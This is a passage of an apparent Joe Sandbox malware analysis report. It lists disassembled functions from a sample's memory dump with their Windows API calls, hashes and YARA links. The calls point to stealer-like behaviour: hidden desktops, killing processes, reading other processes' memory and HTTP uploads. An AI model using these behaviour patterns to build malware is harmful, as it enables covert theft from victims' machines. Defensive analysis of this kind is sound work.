                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$CloseFile$FirstNextOpenQueryValuelstrcpymemset
                                                                                                                                                                                                                                                  • String ID: "6c$@6c$X6c
                                                                                                                                                                                                                                                  • API String ID: 358504995-2427117290
                                                                                                                                                                                                                                                  • Opcode ID: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
                                                                                                                                                                                                                                                  • Instruction ID: 8ce6d133dbaa78a80648663bb2cd2f3d63f3f21ed6101d4eee44cb8591f27300
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAC15D71D007488ACF01EFA8C9828FE77F4BF5D744B409299ED466A112EB30AAD5CB91
                                                                                                                                                                                                                                                  Function 00B08A6E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 199networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B06E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,00B06F0F,?,?,?,?), ref: 00B06E7A
                                                                                                                                                                                                                                                    • Part of subcall function 00B06E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 00B06E86
                                                                                                                                                                                                                                                    • Part of subcall function 00B06E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 00B06E92
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00B08AEA
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00B08B23
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B08B9B
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00B08BAF
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B08BC7
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B08BFF
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B08C95
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B08D03
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttplstrcpy$ConnectFileInfoOptionQueryReadRequestSend
                                                                                                                                                                                                                                                  • String ID: p7c
                                                                                                                                                                                                                                                  • API String ID: 4244444472-4010549652
                                                                                                                                                                                                                                                  • Opcode ID: 22e25e8e46289607b9d5628619eb8ac4b8640834c60657c462aab1fc5886c734
                                                                                                                                                                                                                                                  • Instruction ID: 1c2c1d3aeba56305821071cb97f83018aece97b92e373525900089834954debe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22e25e8e46289607b9d5628619eb8ac4b8640834c60657c462aab1fc5886c734
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7471F071A002599EDB10DF60DC86BEEBBF9EF84700F00515CF845AB291EF709A85CBA1
                                                                                                                                                                                                                                                  Function 00B0ADF6 Relevance: 15.2, APIs: 10, Instructions: 191stringsleepprocessCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B0AE10
                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00B0AE7F
                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 00B0AEA3
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B0AEBA
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B0AEC6
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B0AED0
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B0AF0A
                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 00B0AFDB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 00B0AFEE
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B0AA28: memset.MSVCRT ref: 00B0AAFC
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B155BF
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: Process32First.KERNEL32(00000000,?), ref: 00B155C9
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: Process32Next.KERNEL32(00000000,?), ref: 00B155D5
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B155F9
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: TerminateProcess.KERNEL32(00000000,00000000), ref: 00B15608
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: CloseHandle.KERNEL32(00000000), ref: 00B1560F
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: Process32Next.KERNEL32(00000000,?), ref: 00B15617
                                                                                                                                                                                                                                                    • Part of subcall function 00B155A9: CloseHandle.KERNEL32(00000000), ref: 00B15622
                                                                                                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 00B0B0A2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcat$FirstSleepSnapshotTerminateToolhelp32lstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2291945429-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d6afacdb9a6ceaea191d692fe4955dc14e1571e053833d46d2c99cb42a5a63d
                                                                                                                                                                                                                                                  • Instruction ID: 2f6e2d97dfb8d6b2d0e7b05efeaf55cb00719c56098459ad1a5b17b69e14e14a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d6afacdb9a6ceaea191d692fe4955dc14e1571e053833d46d2c99cb42a5a63d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E581E131C00389DADB11EF24DC42BDABBF5BF55304F40A659F98966152EB70A7C8CB81
                                                                                                                                                                                                                                                  Function 00B18F80 Relevance: 13.8, APIs: 9, Instructions: 267stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B18F9C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B18FAD
                                                                                                                                                                                                                                                    • Part of subcall function 00B14D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B14D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B18FEB
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B18FF9
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B19006
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B0D4: GetFileSizeEx.KERNEL32(00000000,?), ref: 00B0B11C
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B0D4: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 00B0B13F
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B0D4: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 00B0B160
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B0D4: CloseHandle.KERNEL32(00000000), ref: 00B0B186
                                                                                                                                                                                                                                                    • Part of subcall function 00B15202: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00B19104,?,?,?), ref: 00B1520D
                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,?,?,?), ref: 00B1910D
                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B1928E
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,00B0882B,00000000,?,?,?,?,?,?,?), ref: 00B0B1AD
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B19F: LocalAlloc.KERNEL32(00000040,00000000,?,00B0882B,00000000,?,?,?,?,?,?,?), ref: 00B0B1D8
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC), ref: 00B19238
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,-0000000C), ref: 00B1924A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Alloc$FileGlobalLocallstrcpymemset$CloseFolderFreeHandlePathReadSizelstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 652918382-0
                                                                                                                                                                                                                                                  • Opcode ID: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
                                                                                                                                                                                                                                                  • Instruction ID: ca0457068ad0087582846a0475b70c242e5f5c0add901da7f0a4f3bb16e90d45
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3B15E71D007599BCF10DFA4C8829EE7BF9FF49300F405599E906A7252EB70AA89CB90
                                                                                                                                                                                                                                                  Function 00B1F9D5 Relevance: 13.7, APIs: 9, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B1FE13), ref: 00B1F9E6
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B1FE13), ref: 00B1FA2A
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FA46
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FA67
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FA9C
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FAB0
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1FB3E
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1FB5D
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1FB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$PointerUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4184024484-0
                                                                                                                                                                                                                                                  • Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction ID: 76091e65c4097a8f8f0e0d7a10218cc4f7d1ae440235ce0a6434d0534394e92f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18515571208306ABD724DF19C894EABBBF9FFC4704F51482DF98997211D734A845CBA1
                                                                                                                                                                                                                                                  Function 0041F51E Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00010000,?,004200FB,?), ref: 0041F526
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645128), ref: 0041F570
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064512C), ref: 0041F5A7
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645134), ref: 0041F5DC
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064513C), ref: 0041F611
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645144), ref: 0041F646
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064514C), ref: 0041F67B
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645154), ref: 0041F6A5
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064515C), ref: 0041F6D6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1659193697-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction ID: b1bc6718bd93d0afd4b9143767effb8c204e4d7c234b08edbe8f1f012b2e33c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A413078345BD16BEB319B24AD5839B3E97575370CF48207AE042972A3D3FC448B8759
                                                                                                                                                                                                                                                  Function 00B1F785 Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,00010000,?,00B20362,?), ref: 00B1F78D
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645128), ref: 00B1F7D7
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064512C), ref: 00B1F80E
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645134), ref: 00B1F843
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064513C), ref: 00B1F878
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645144), ref: 00B1F8AD
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064514C), ref: 00B1F8E2
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645154), ref: 00B1F90C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064515C), ref: 00B1F93D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1659193697-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction ID: 30094e4e9a28013946a5349e833e9597ccc5992dd58b62bf26feb48e31d9abac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74416478644FC1AFEB319B24AD487A63EDB9723358F9820B8E442971A3C3F88485C755
                                                                                                                                                                                                                                                  Function 00B135AC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B135C9
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00B135ED
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B13614
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(000000FF,00000000,?,00000208,00000000,??d,00643F3F,-00000208,?,000000FF,00000FFF,?,?), ref: 00B136C3
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(00000000,??d,00643F3F,00000000,00000000,000000FF,00000FFF,00000000,?), ref: 00B13741
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$MemoryOpenReadmemset
                                                                                                                                                                                                                                                  • String ID: ??d
                                                                                                                                                                                                                                                  • API String ID: 960838850-3262641346
                                                                                                                                                                                                                                                  • Opcode ID: 89e6c9af5f48b8ed443eb51b86c866745eb1c3a28019441fa6cceb2bf1d7dc79
                                                                                                                                                                                                                                                  • Instruction ID: dd2fc6189f56749974ca550961f6a2fac4fa32c98d250ba0d72657e2e61c6113
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89e6c9af5f48b8ed443eb51b86c866745eb1c3a28019441fa6cceb2bf1d7dc79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F55101B1508340ABD720DF10D845B9B7BE5EB96B00F4409ADF8849B3C2E3759E49D7A3
                                                                                                                                                                                                                                                  Function 00408695 Relevance: 12.1, APIs: 8, Instructions: 120networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004086E6
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004086FB
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040875D
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00408772
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040878C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 004087B1
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004087B8
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004087C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$CrackCreateOpenReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3324746675-0
                                                                                                                                                                                                                                                  • Opcode ID: 57e37dd70aee1b64da78086fa66d258c66e99df84f6a0c234287eb83fcdaefd4
                                                                                                                                                                                                                                                  • Instruction ID: 29006633d65c6e203f8d5fdba3151149f46b1154e2f49980151adca0ed2b26b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e37dd70aee1b64da78086fa66d258c66e99df84f6a0c234287eb83fcdaefd4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41A6B59002099BDB10EF71CD85AEF7BB9EF84344F10402DF915A3191EF34AA4ACBA5
                                                                                                                                                                                                                                                  Function 00B155A9 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B155BF
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00B155C9
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00B155D5
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B155F9
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B15608
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B1560F
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00B15617
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B15622
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
